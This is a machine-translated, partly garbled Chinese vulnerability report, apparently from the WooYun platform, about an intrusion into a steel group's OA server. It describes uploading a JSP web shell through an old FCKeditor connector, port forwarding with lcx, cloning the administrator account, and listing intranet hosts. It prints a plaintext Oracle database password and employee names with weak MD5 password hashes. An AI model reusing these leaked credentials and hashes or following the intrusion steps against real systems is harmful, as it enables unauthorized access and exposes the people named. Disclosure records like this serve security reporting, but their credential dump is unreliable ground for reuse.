攀枝花钢城集团某服务器内网渗透

漏洞标题 攀枝花钢城集团某服务器内网渗透 相关厂商 攀枝花钢城集团 漏洞作者 路人甲 提交时间 2016-04-26 00:10 公开时间 2016-06-12 18:20 漏洞类型 成功的入侵事件 …

漏洞标题 攀枝花钢城集团服务内网渗透 相关制造商 攀枝花钢城集团 漏洞作者 过路人 提交时间 2016-04-26 00: 10 公共时间 2016-06-12 18: 20 漏洞类型 成功入侵 危险等级 高 自我评估等级 20 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 任何文件上传 漏洞详细信息 攀枝花钢城集团办公室协作系统(OA)采用低版金蝶OA OA地址:**。**。**。**: 7890/oa/themes/mskin/login/login.jsp

系统使用低版本的FCKeditor上传任何文件 **。**。**。**: 7890/oa/components/fck/editor/filemanager/browser/default/browser.html?Connector=**。**。**。**: 7890/oa /组件/FCK /编辑器/文件管理器/浏览器/默认/接头/JSP /连接器

漏洞证明: 上传shell:2.jsp

找到数据库配置文件 < Resource name='jdbc/DefaultDS'auth='Container'type='javax.sql.DataSource' maxActive='100'maxIdle='20'maxWait='10000'initialSize='10'minIdle='10' removeAbandoned='true'removeAbandonedTimeout='60'logAbandoned='true' Username='oadb'password='gcjtoa'driverClassName='oracle.jdbc.OracleDriver' Url='jdbc: oracle: thin: @ //**。**。**。**: 1521/oradata'/> Oracle数据库

管理员权限

只有一个网络端口,ip显示是一个内部网。交换机应使用NAT Server服务将Intranet 80端口映射到公共网络的7890端口。

上传lcx进行端口转发

修改注册表以克隆管理员用户

OA用户

共1443位用户

例 新余化工技术研发中心670b14728ad9902aecba32e22fa4f6bd 李洋202cb962ac59075b964b07152d234b70 新余化学海绵钛业务中心670b14728ad9902aecba32e22fa4f6bd 黄平安202cb962ac59075b964b07152d234b70 Rui Mine政治部670b14728ad9902aecba32e22fa4f6bd 瑞矿安全分公司8aec51422b30d61bce078b27f0babeb1 瑞矿综合办公室202cb962ac59075b964b07152d234b70 傅成勇670b14728ad9902aecba32e22fa4f6bd 邱军202cb962ac59075b964b07152d234b70 任兵b96946657983c67d690243a42dde4bfe 综合财务部e99a18c428cb38d5f260853678922e03 综合技术质量部门1b18918b3565fc7ee82291beb1ddb7b7 综合供应和营销部门202cb962ac59075b964b07152d234b70 一般分配部门202cb962ac59075b964b07152d234b70 天捷地产6364d9d3f59aa53792fa62e5f161ca8a 绿源劳动管理科202cb962ac59075b964b07152d234b70 谢永强670b14728ad9902aecba32e22fa4f6bd 阳信办公室a0260f8b9817d316b32783dd9e644d01 阳信财务部ba311493f529374f0c33b5e9433574d7 瑞天政工(人事)部670b14728ad9902aecba32e22fa4f6bd 瑞泰电器维修分公司202cb962ac59075b964b07152d234b70 Panxin Finance Section 202cb962ac59075b964b07152d234b70 瑞通节能服务部670b14728ad9902aecba32e22fa4f6bd 瑞天政治工作(人事)部

瑞通西昌营运部

绿源综合管理部

贸易公司财务部门

有太多东西〜我不会在这里发布数据。 内联网渗透 C: \ Documents and Settings \ Administrator>净视图 服务器名称评论 -------------------------------------------------- ------------------- \\ GCJT-08361BB1B9 \\ GQSVR-IMTS \\ GQSVR-MTS \\ HRSRV \\ NC1 \\ OASERVER \\ VM01 \\ WEB-INTERNAT \\ WIN-8AGEFMEVINN \\ WIN-M2GM273EOU0 \\ YCGS-56F26EED9D 命令成功完成。 修理计划: 好奇的白帽纸,没有邪恶 版权声明:请注明出处。居民A @乌云

你可能感兴趣的文章

相关问题